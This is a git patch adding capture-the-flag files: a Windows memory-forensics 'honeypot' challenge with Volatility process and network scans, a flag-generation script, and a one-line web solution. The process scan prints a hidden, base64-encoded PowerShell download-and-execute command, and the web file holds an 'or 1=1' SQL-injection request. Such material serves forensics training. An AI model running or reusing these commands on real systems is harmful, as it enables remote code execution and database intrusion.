From b3014e4977014b0f2a1960ff4e878464acc5d0f7 Mon Sep 17 00:00:00 2001 From: aaron Date: Thu, 2 Dec 2021 22:01:31 +0100 Subject: [PATCH] add forensics --- forensics/honeypot/connected_ips | 72 +++++++++++++++ forensics/honeypot/generate_flags.sh | 21 +++++ forensics/honeypot/test | 129 +++++++++++++++++++++++++++ forensics/honeypot/win_cmdline | 60 +++++++++++++ forensics/honeypot/win_netscan | 62 +++++++++++++ web/loesungsvorschlag | 2 + 6 files changed, 346 insertions(+) create mode 100644 forensics/honeypot/connected_ips create mode 100755 forensics/honeypot/generate_flags.sh create mode 100644 forensics/honeypot/test create mode 100644 forensics/honeypot/win_cmdline create mode 100644 forensics/honeypot/win_netscan create mode 100644 web/loesungsvorschlag diff --git a/forensics/honeypot/connected_ips b/forensics/honeypot/connected_ips new file mode 100644 index 0000000..b54c37a --- /dev/null +++ b/forensics/honeypot/connected_ips @@ -0,0 +1,72 @@ +0.0.0.0 +0.0.0.0 +10.0.2.15 +93.184.220.29 +10.0.2.15 +172.67.177.22 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +10.0.2.15 +0.0.0.0 +0.0.0.0 +10.0.2.15 +0.0.0.0 +10.0.2.15 +212.205.126.106 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +10.0.2.15 +10.0.2.15 +147.182.172.189 +10.0.2.15 +212.205.126.106 +10.0.2.15 +212.205.126.106 +0.0.0.0 +0.0.0.0 +127.0.0.1 +0.0.0.0 +0.0.0.0 +10.0.2.15 +212.205.126.106 +10.0.2.15 +204.79.197.203 +10.0.2.15 +95.100.210.141 +10.0.2.15 +212.205.126.106 +10.0.2.15 +212.205.126.106 +10.0.2.15 +172.67.177.22 +10.0.2.15 +95.100.210.141 diff --git a/forensics/honeypot/generate_flags.sh b/forensics/honeypot/generate_flags.sh new file mode 100755 index 0000000..636b329 --- /dev/null +++ b/forensics/honeypot/generate_flags.sh 
@@ -0,0 +1,21 @@ +#!/bin/bash + +list=( + 10.0.2.15 + 127.0.0.1 + 65.55.44.109 + 147.182.172.189 + 172.67.177.22 + 204.79.197.203 + 212.205.126.106 + 93.184.220.29 + 95.100.210.141 +) + + +for ip in ${list[@]}; do + echo Generating Flag from $ip: + echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum}" + echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum)}" +done + diff --git a/forensics/honeypot/test b/forensics/honeypot/test new file mode 100644 index 0000000..0704395 --- /dev/null +++ b/forensics/honeypot/test @@ -0,0 +1,129 @@ +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +65.55.44.109 +0.0.0.0 +0.0.0.0 +0.0.0.0 +10.0.2.15 +93.184.220.29 +10.0.2.15 +172.67.177.22 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +10.0.2.15 +0.0.0.0 +0.0.0.0 +10.0.2.15 +0.0.0.0 +10.0.2.15 +212.205.126.106 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +10.0.2.15 +10.0.2.15 +147.182.172.189 +10.0.2.15 +212.205.126.106 +10.0.2.15 +212.205.126.106 +0.0.0.0 +0.0.0.0 +127.0.0.1 +0.0.0.0 +0.0.0.0 +10.0.2.15 +212.205.126.106 +10.0.2.15 +204.79.197.203 +10.0.2.15 +95.100.210.141 +10.0.2.15 +212.205.126.106 +10.0.2.15 +212.205.126.106 +10.0.2.15 +172.67.177.22 +10.0.2.15 +95.100.210.141 
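Review bot: The flag printed on the last line of the loop in generate_flags.sh keeps md5sum's trailing `  -` inside the braces, because the command substitution captures the whole `<hex>  -` line that md5sum prints when it reads stdin, so the emitted value is `HTB{<hex>  -}` rather than `HTB{<hex>}`; strip the field before wrapping it, e.g. `hash=$(printf '%s' "https://windowsliveupdater.com/update.ps1_2700_$ip" | md5sum)` followed by `echo "HTB{${hash%% *}}"`. The line just above it, `echo "HTB{echo -n "…"|md5sum}"`, prints the command text rather than a digest (the inner double quotes close and reopen the string, so the pipe is never executed); if it is meant to document the recipe, a `#` comment says so more clearly, otherwise it reads as a leftover debug line. The loop header and the progress line expand `${list[@]}` and `$ip` unquoted; the values are plain IPs so this is harmless today, but `for ip in "${list[@]}"; do` and `printf 'Generating Flag from %s:\n' "$ip"` are the forms that stay correct if the list ever holds anything else.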
diff --git a/forensics/honeypot/win_cmdline b/forensics/honeypot/win_cmdline
new file mode 100644
index 0000000..4c89fcc
--- /dev/null
+++ b/forensics/honeypot/win_cmdline
@@ -0,0 +1,60 @@
+Volatility 3 Framework 1.0.1
+
+PID Process Args
+
+4 System Required memory at 0x10 is not valid (process exited?)
+236 smss.exe \SystemRoot\System32\smss.exe
+308 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
+348 wininit.exe wininit.exe
+360 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
+400 services.exe C:\Windows\system32\services.exe
+408 lsass.exe C:\Windows\system32\lsass.exe
+416 lsm.exe C:\Windows\system32\lsm.exe
+496 winlogon.exe winlogon.exe
+572 svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch
+636 VBoxService.ex C:\Windows\System32\VBoxService.exe
+692 svchost.exe C:\Windows\system32\svchost.exe -k RPCSS
+744 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
+848 svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
+888 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs
+1012 svchost.exe C:\Windows\system32\svchost.exe -k LocalService
+1084 svchost.exe C:\Windows\system32\svchost.exe -k NetworkService
+1208 spoolsv.exe C:\Windows\System32\spoolsv.exe
+1252 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
+1376 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature Heartbeat
+1396 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature KvpExchange
+1432 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature Shutdown
+1440 taskhost.exe "taskhost.exe"
+1504 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature TimeSync
+1532 dwm.exe "C:\Windows\system32\Dwm.exe"
+1540 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature VSS
+1556 explorer.exe C:\Windows\Explorer.EXE
+1620 svchost.exe C:\Windows\System32\svchost.exe -k utcsvc
+1716 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
+1872 cygrunsrv.exe "C:\Program Files\OpenSSH\bin\cygrunsrv.exe"
+1956 wlms.exe C:\Windows\system32\wlms\wlms.exe
+1612 cygrunsrv.exe Required memory at 0x7ffd9010 is not valid (process exited?)
+1684 conhost.exe \??\C:\Windows\system32\conhost.exe "-57088940168010838710243314093101560802089520680-1936804963-2081634044-598129742
+1676 sshd.exe "C:\Program Files\OpenSSH\usr\sbin\sshd.exe"
+1800 sppsvc.exe C:\Windows\system32\sppsvc.exe
+2080 svchost.exe C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
+2360 SearchIndexer. C:\Windows\system32\SearchIndexer.exe /Embedding
+2440 SearchProtocol "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
+2460 SearchFilterHo "C:\Windows\system32\SearchFilterHost.exe" 0 504 508 516 65536 512
+2616 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
+2644 winlogon.exe winlogon.exe
+2784 taskhost.exe "taskhost.exe"
+2844 dwm.exe "C:\Windows\system32\Dwm.exe"
+2856 explorer.exe C:\Windows\Explorer.EXE
+3108 regsvr32.exe Required memory at 0x7ffd5010 is not valid (process exited?)
+3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
+3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
+3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
+3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3324 CREDAT:14337
+2700 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
+3732 conhost.exe \??\C:\Windows\system32\conhost.exe "288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
+4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?)
+4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process exited?)
+2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe"
+2920 conhost.exe \??\C:\Windows\system32\conhost.exe "280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
+168 dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
diff --git a/forensics/honeypot/win_netscan b/forensics/honeypot/win_netscan
new file mode 100644
index 0000000..02006f9
--- /dev/null
+++ b/forensics/honeypot/win_netscan
@@ -0,0 +1,62 @@
+Volatility 3 Framework 1.0.1
+
+Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
+
+0x23d04218 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 400 services.exe N/A
+0x23d04218 TCPv6 :: 49155 :: 0 LISTENING 400 services.exe N/A
+0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - -
+0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - -
+0x3e22f008 UDPv4 0.0.0.0 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
+0x3e22f008 UDPv6 :: 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
+0x3e238300 TCPv4 0.0.0.0 445 0.0.0.0 0 LISTENING 4 System N/A
+0x3e238300 TCPv6 :: 445 :: 0 LISTENING 4 System N/A
+0x3e24c588 UDPv4 0.0.0.0 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000
+0x3e281368 UDPv4 10.0.2.15 138 * 0 4 System 2021-11-25 19:12:23.000000
+0x3e2a29b8 UDPv4 0.0.0.0 0 * 0 1084 svchost.exe 2021-11-25 19:12:23.000000
+0x3e2a29b8 UDPv6 :: 0 * 0 1084 svchost.exe 2021-11-25 19:12:23.000000
+0x3e2a6448 UDPv4 0.0.0.0 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
+0x3e2b5b88 TCPv4 10.0.2.15 139 0.0.0.0 0 LISTENING 4 System N/A
+0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - -
+0x3e354618 UDPv6 fe80::256b:4013:4140:453f 546 * 0 744 svchost.exe 2021-11-25 19:12:31.000000
+0x3e3b0c70 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
+0x3e5e4f50 UDPv4 0.0.0.0 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
+0x3e5e4f50 UDPv6 :: 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000
+0x3e5f77a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 1676 sshd.exe N/A
+0x3e619578 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 348 wininit.exe N/A
+0x3e619578 TCPv6 :: 49152 :: 0 LISTENING 348 wininit.exe N/A
+0x3e619cc0 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 348 wininit.exe N/A
+0x3e630008 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
+0x3e630008 UDPv6 :: 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
+0x3e630a20 TCPv4 0.0.0.0 49156 0.0.0.0 0 LISTENING 408 lsass.exe N/A
+0x3e630a20 TCPv6 :: 49156 :: 0 LISTENING 408 lsass.exe N/A
+0x3e648508 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 744 svchost.exe N/A
+0x3e648508 TCPv6 :: 49153 :: 0 LISTENING 744 svchost.exe N/A
+0x3e6b92c0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 692 svchost.exe N/A
+0x3e6b92c0 TCPv6 :: 135 :: 0 LISTENING 692 svchost.exe N/A
+0x3e6b9910 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 692 svchost.exe N/A
+0x3e6f0bd8 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 744 svchost.exe N/A
+0x3e75f8e0 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 888 svchost.exe N/A
+0x3e762a40 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 400 services.exe N/A
+0x3e7686e8 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 888 svchost.exe N/A
+0x3e7686e8 TCPv6 :: 49154 :: 0 LISTENING 888 svchost.exe N/A
+0x3e8611f0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 1676 sshd.exe N/A
+0x3e8611f0 TCPv6 :: 22 :: 0 LISTENING 1676 sshd.exe N/A
+0x3e9be828 TCPv4 0.0.0.0 49156 0.0.0.0 0 LISTENING 408 lsass.exe N/A
+0x3ed036c8 UDPv4 10.0.2.15 137 * 0 4 System 2021-11-25 19:12:23.000000
+0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - -
+0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - -
+0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - -
+0x3f2cff50 UDPv4 0.0.0.0 0 * 0 - - 2021-11-25 19:13:04.000000
+0x3f2cff50 UDPv6 :: 0 * 0 - - 2021-11-25 19:13:04.000000
+0x3f4d7378 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
+0x3f4dad28 UDPv4 127.0.0.1 58426 * 0 3344 iexplore.exe 2021-11-25 19:13:31.000000
+0x3f520ab8 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
+0x3f520ab8 UDPv6 :: 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000
+0x3f546de8 UDPv4 0.0.0.0 0 * 0 636 VBoxService.ex 2021-11-25 19:14:14.000000
+0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - -
+0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - -
+0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - -
+0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - -
+0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - -
+0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - -
+0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - -
diff --git a/web/loesungsvorschlag b/web/loesungsvorschlag
new file mode 100644
index 0000000..b05f853
--- /dev/null
+++ b/web/loesungsvorschlag
@@ -0,0 +1,2 @@
+curl -X POST 127.0.0.1:1337/api/submit -H 'Content-Type: application/json' -d
+'{"query":"or 1=1"}'